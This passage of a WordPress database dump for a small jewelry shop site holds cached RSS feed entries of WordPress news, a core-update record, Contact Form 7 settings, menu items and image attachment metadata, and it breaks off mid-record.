2015</a></p></blockquote>\n<p></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Mar 2015 18:47:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"WPTavern: bbPress 2.5.5 Released, Patches Three Potential Security Vulnerabilities\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40253\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"http://wptavern.com/bbpress-2-5-5-released-patches-three-potential-security-vulnerabilities\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:907:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/06/bbpress.png\" rel=\"prettyphoto[40253]\"><img class=\"aligncenter size-full wp-image-24338\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/06/bbpress.png?resize=1025%2C378\" alt=\"bbpress\" /></a></p>\n<p>bbPress 2.5.5 is <a title=\"https://bbpress.org/blog/2015/03/bbpress-2-5-5-security-release/\" href=\"https://bbpress.org/blog/2015/03/bbpress-2-5-5-security-release/\">available for download</a>. This release fixes three potential security vulnerabilities reported by <a title=\"https://profiles.wordpress.org/jdgrimes\" href=\"https://profiles.wordpress.org/jdgrimes\">J.D. Grimes</a> and was pushed out within nearly 24 hours of being notified. Users should update as soon as possible as all previous 2.x versions are vulnerable. The patches have also been applied to the 2.6 development branch that will soon have a beta release.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Mar 2015 17:24:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Matt: 25k DMCA Win\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44791\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"http://ma.tt/2015/03/25k-dmca-win/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:566:\"<blockquote><p>WordPress [actually Automattic] has scored an important victory in court against a man who abused the DMCA to censor an article of a critical journalist. The court agreed that the takedown request was illegitimate and awarded WordPress roughly $25,000 in damages and attorneys fees.</p></blockquote>\n<p>Yes! Good laws become bad when people abuse them. Here’s the source: <a href=\"http://torrentfreak.com/wordpress-wins-25000-from-dmca-takedown-abuser-150305/\">WordPress Wins $25,000 From DMCA Takedown Abuser</a> (s/WordPress/Automattic/).</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 08 Mar 2015 17:55:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"Matt: Psychology of a Small Playlist\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44757\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"http://ma.tt/2015/03/psychology-of-a-small-playlist/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:240:\"<p>Joseph Mosby experiments with my trick of listening to a song on repeat to get work done, <a href=\"http://josephmosby.com/2015/02/15/the-psychology-of-a-small-playlist-on-repeat.html\">and digs a bit into the psychology behind it</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 08 Mar 2015 07:10:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sun, 22 Mar 2015 22:32:59 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:14:\"content-length\";s:6:\"181844\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Sun, 22 Mar 2015 22:15:14 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";s:13:\"accept-ranges\";s:5:\"bytes\";}s:5:\"build\";s:14:\"20130911090210\";}','no'),(1034,'_transient_timeout_wc_low_stock_count','1429655518','no'),(1035,'_transient_wc_low_stock_count','0','no'),(1036,'_transient_timeout_wc_outofstock_count','1429655518','no'),(1037,'_transient_wc_outofstock_count','0','no'),(464,'woocommerce_tracker_last_send','1427214687','yes'),(469,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.1.1-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.1.1\";s:7:\"version\";s:5:\"4.1.1\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.1\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1427741568;s:15:\"version_checked\";s:5:\"4.1.1\";s:12:\"translations\";a:0:{}}','yes'); /*!40000 ALTER TABLE `wp_options` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_postmeta` -- DROP TABLE IF EXISTS `wp_postmeta`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_postmeta` ( `meta_id` bigint(20) unsigned NOT NULL auto_increment, `post_id` bigint(20) unsigned NOT NULL default '0', `meta_key` varchar(255) default NULL, `meta_value` longtext, PRIMARY KEY (`meta_id`), KEY `post_id` (`post_id`), KEY `meta_key` (`meta_key`) ) ENGINE=MyISAM AUTO_INCREMENT=498 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_postmeta` -- LOCK TABLES `wp_postmeta` WRITE; /*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */; INSERT INTO `wp_postmeta` VALUES (1,2,'_wp_page_template','default'),(6,10,'_form','<table>\n<tr><td>Name</td><td> [text* your-name] *</td></tr>\n\n<tr><td>Email</td><td>[email* your-email] *</td></tr>\n\n<tr><td>Subject</td><td>[text* your-subject] *</td></tr>\n\n<tr><td>Message</td><td>[textarea* your-message] *</td></tr>\n\n<tr><td>Security Code</td><td>[captchac captcha]</td></tr>\n<tr><td>Retype Code</td><td>[captchar captcha]</td></tr>\n<tr><td></td><td>[submit \"Send\"]</td></tr>\n</table>'),(7,10,'_mail','a:8:{s:7:\"subject\";s:14:\"[your-subject]\";s:6:\"sender\";s:38:\"[your-name] <wordpress@atgjewelry.com>\";s:4:\"body\";s:170:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on fuze7 (http://atgjewelry.com/fuze7)\";s:9:\"recipient\";s:15:\"diane@fuze7.com\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:1;s:13:\"exclude_blank\";b:0;}'),(8,10,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:14:\"[your-subject]\";s:6:\"sender\";s:32:\"fuze7 <wordpress@atgjewelry.com>\";s:4:\"body\";s:112:\"Message Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on fuze7 (http://atgjewelry.com/fuze7)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:32:\"Reply-To: daniel@tualatinweb.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(9,10,'_messages','a:23:{s:12:\"mail_sent_ok\";s:43:\"Your message was sent successfully. Thanks.\";s:12:\"mail_sent_ng\";s:93:\"Failed to send your message. Please try later or contact the administrator by another method.\";s:16:\"validation_error\";s:74:\"Validation errors occurred. Please confirm the fields and submit it again.\";s:4:\"spam\";s:93:\"Failed to send your message. Please try later or contact the administrator by another method.\";s:12:\"accept_terms\";s:35:\"Please accept the terms to proceed.\";s:16:\"invalid_required\";s:34:\"Please fill in the required field.\";s:16:\"invalid_too_long\";s:23:\"This input is too long.\";s:17:\"invalid_too_short\";s:24:\"This input is too short.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:14:\"invalid_number\";s:28:\"Number format seems invalid.\";s:16:\"number_too_small\";s:25:\"This number is too small.\";s:16:\"number_too_large\";s:25:\"This number is too large.\";s:13:\"invalid_email\";s:28:\"Email address seems invalid.\";s:11:\"invalid_url\";s:18:\"URL seems invalid.\";s:11:\"invalid_tel\";s:31:\"Telephone number seems invalid.\";s:23:\"quiz_answer_not_correct\";s:27:\"Your answer is not correct.\";s:12:\"invalid_date\";s:26:\"Date format seems invalid.\";s:14:\"date_too_early\";s:23:\"This date is too early.\";s:13:\"date_too_late\";s:22:\"This date is too late.\";s:13:\"upload_failed\";s:22:\"Failed to upload file.\";s:24:\"upload_file_type_invalid\";s:30:\"This file type is not allowed.\";s:21:\"upload_file_too_large\";s:23:\"This file is too large.\";s:23:\"upload_failed_php_error\";s:38:\"Failed to upload file. Error occurred.\";}'),(10,10,'_additional_settings',''),(11,10,'_locale','en_US'),(12,1,'post_views_count','2'),(214,71,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:512;s:4:\"file\";s:44:\"2015/02/40_2210_8804S_98_C630_3-1024x512.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"40_2210_8804S_98_C630_3-1024x512-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"40_2210_8804S_98_C630_3-1024x512-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:45:\"40_2210_8804S_98_C630_3-1024x512-1024x512.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:42:\"40_2210_8804S_98_C630_3-1024x512-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:44:\"40_2210_8804S_98_C630_3-1024x512-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:44:\"40_2210_8804S_98_C630_3-1024x512-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:44:\"40_2210_8804S_98_C630_3-1024x512-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:43:\"40_2210_8804S_98_C630_3-1024x512-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(213,71,'_wp_attached_file','2015/02/40_2210_8804S_98_C630_3-1024x512.jpg'),(212,70,'_edit_lock','1423766166:1'),(32,13,'_menu_item_menu_item_parent','0'),(90,30,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:120;s:6:\"height\";i:105;s:4:\"file\";s:49:\"2015/02/All-that-glitters-jewelery-and-loands.png\";s:5:\"sizes\";a:2:{s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:47:\"All-that-glitters-jewelery-and-loands-90x90.png\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:48:\"All-that-glitters-jewelery-and-loands-100x30.png\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(89,30,'_wp_attached_file','2015/02/All-that-glitters-jewelery-and-loands.png'),(31,13,'_menu_item_type','post_type'),(33,13,'_menu_item_object_id','9'),(34,13,'_menu_item_object','page'),(35,13,'_menu_item_target',''),(36,13,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(37,13,'_menu_item_xfn',''),(38,13,'_menu_item_url',''),(58,6,'_edit_lock','1423601762:2'),(40,14,'_menu_item_type','post_type'),(41,14,'_menu_item_menu_item_parent','0'),(42,14,'_menu_item_object_id','8'),(43,14,'_menu_item_object','page'),(44,14,'_menu_item_target',''),(45,14,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(46,14,'_menu_item_xfn',''),(47,14,'_menu_item_url',''),(59,6,'_edit_last','2'),(49,15,'_menu_item_type','post_type'),(50,15,'_menu_item_menu_item_parent','0'),(51,15,'_menu_item_object_id','7'),(52,15,'_menu_item_object','page'),(53,15,'_menu_item_target',''),(54,15,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(55,15,'_menu_item_xfn',''),(56,15,'_menu_item_url',''),(60,6,'_wp_page_template','page-home.php'),(61,23,'_wp_attached_file','2015/02/All-that-glitters-jewelery-and-loands.jpg'),(62,23,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:120;s:6:\"height\";i:105;s:4:\"file\";s:49:\"2015/02/All-that-glitters-jewelery-and-loands.jpg\";s:5:\"sizes\";a:2:{s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:47:\"All-that-glitters-jewelery-and-loands-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:48:\"All-that-glitters-jewelery-and-loands-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(63,23,'_wp_attachment_image_alt','Al that glitters, Jewelry and Loans'),(222,83,'_edit_lock','1426445880:2'),(77,27,'_edit_lock','1425935890:1'),(78,27,'_edit_last','1'),(79,27,'_wp_page_template','page-fullwidth.php'),(272,142,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:318;s:6:\"height\";i:157;s:4:\"file\";s:19:\"2015/02/jewelry.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"jewelry-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"jewelry-300x148.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"jewelry-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"jewelry-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"jewelry-300x157.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"jewelry-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:18:\"jewelry-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(271,142,'_wp_attached_file','2015/02/jewelry.jpg'),(91,2,'_edit_lock','1424746531:2'),(92,31,'_edit_lock','1425937391:1'),(93,31,'_edit_last','1'),(94,31,'_wp_page_template','page-fullwidth.php'),(95,34,'_edit_lock','1426051229:2'),(96,34,'_edit_last','2'),(97,34,'_wp_page_template','page-fullwidth.php'),(98,37,'_edit_lock','1426031176:2'),(99,37,'_edit_last','2'),(100,37,'_wp_page_template','page-fullwidth.php'),(101,39,'_edit_lock','1426030463:2'),(102,39,'_edit_last','2'),(103,39,'_wp_page_template','page-fullwidth.php'),(104,41,'_edit_lock','1426039923:1'),(105,41,'_edit_last','2'),(106,41,'_wp_page_template','page-fullwidth.php'),(107,43,'_edit_lock','1424747297:2'),(108,43,'_edit_last','2'),(109,43,'_wp_page_template','page-fullwidth.php'),(110,45,'_edit_lock','1425937687:1'),(111,45,'_edit_last','1'),(112,45,'_wp_page_template','page-fullwidth.php'),(113,48,'_edit_lock','1427065760:1'),(114,48,'_edit_last','1'),(115,48,'_wp_page_template','page-home.php'),(116,8,'_edit_last','2'),(117,8,'_edit_lock','1423601773:2'),(118,7,'_edit_last','2'),(119,7,'_edit_lock','1424042889:2'),(120,9,'_edit_last','2'),(121,9,'_edit_lock','1423601795:2'),(122,60,'_menu_item_type','post_type'),(123,60,'_menu_item_menu_item_parent','0'),(124,60,'_menu_item_object_id','34'),(125,60,'_menu_item_object','page'),(126,60,'_menu_item_target',''),(127,60,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(128,60,'_menu_item_xfn',''),(129,60,'_menu_item_url',''),(131,61,'_menu_item_type','post_type'),(132,61,'_menu_item_menu_item_parent','0'),(133,61,'_menu_item_object_id','37'),(134,61,'_menu_item_object','page'),(135,61,'_menu_item_target',''),(136,61,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(137,61,'_menu_item_xfn',''),(138,61,'_menu_item_url',''),(140,62,'_menu_item_type','post_type'),(141,62,'_menu_item_menu_item_parent','67'),(142,62,'_menu_item_object_id','45'),(143,62,'_menu_item_object','page'),(144,62,'_menu_item_target',''),(145,62,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(146,62,'_menu_item_xfn',''),(147,62,'_menu_item_url',''),(149,63,'_menu_item_type','post_type'),(150,63,'_menu_item_menu_item_parent','0'),(151,63,'_menu_item_object_id','39'),(152,63,'_menu_item_object','page'),(153,63,'_menu_item_target',''),(154,63,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(155,63,'_menu_item_xfn',''),(156,63,'_menu_item_url',''),(158,64,'_menu_item_type','post_type'),(159,64,'_menu_item_menu_item_parent','0'),(160,64,'_menu_item_object_id','48'),(161,64,'_menu_item_object','page'),(162,64,'_menu_item_target',''),(163,64,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(164,64,'_menu_item_xfn',''),(165,64,'_menu_item_url',''),(176,66,'_menu_item_type','post_type'),(177,66,'_menu_item_menu_item_parent','67'),(178,66,'_menu_item_object_id','41'),(179,66,'_menu_item_object','page'),(180,66,'_menu_item_target',''),(181,66,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(182,66,'_menu_item_xfn',''),(183,66,'_menu_item_url',''),(185,67,'_menu_item_type','post_type'),(186,67,'_menu_item_menu_item_parent','0'),(187,67,'_menu_item_object_id','31'),(188,67,'_menu_item_object','page'),(189,67,'_menu_item_target',''),(190,67,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(191,67,'_menu_item_xfn',''),(192,67,'_menu_item_url',''),(194,68,'_menu_item_type','post_type'),(195,68,'_menu_item_menu_item_parent','67'),(196,68,'_menu_item_object_id','27'),(197,68,'_menu_item_object','page'),(198,68,'_menu_item_target',''),(199,68,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(200,68,'_menu_item_xfn',''),(201,68,'_menu_item_url',''),(258,120,'_wp_page_template','page-fullwidth.php'),(257,120,'_edit_last','1'),(256,120,'_edit_lock','1425937810:1'),(215,70,'_thumbnail_id','71'),(216,70,'_edit_last','1'),(217,72,'_edit_lock','1425953914:1'),(218,73,'_wp_attached_file','2015/02/Alpina-Extreme-Diver-1024x682.jpg'),(219,73,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:41:\"2015/02/Alpina-Extreme-Diver-1024x682.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"Alpina-Extreme-Diver-1024x682-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"Alpina-Extreme-Diver-1024x682-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:42:\"Alpina-Extreme-Diver-1024x682-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:39:\"Alpina-Extreme-Diver-1024x682-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:41:\"Alpina-Extreme-Diver-1024x682-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:41:\"Alpina-Extreme-Diver-1024x682-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:41:\"Alpina-Extreme-Diver-1024x682-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:42:\"Alpina-Extreme-Diver-1024x682-1024x588.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:40:\"Alpina-Extreme-Diver-1024x682-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(220,72,'_thumbnail_id','73'),(221,72,'_edit_last','1'),(223,83,'_edit_last','1'),(224,84,'_wp_attached_file','2015/02/Division_inside-2.jpg'),(225,84,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3600;s:6:\"height\";i:2299;s:4: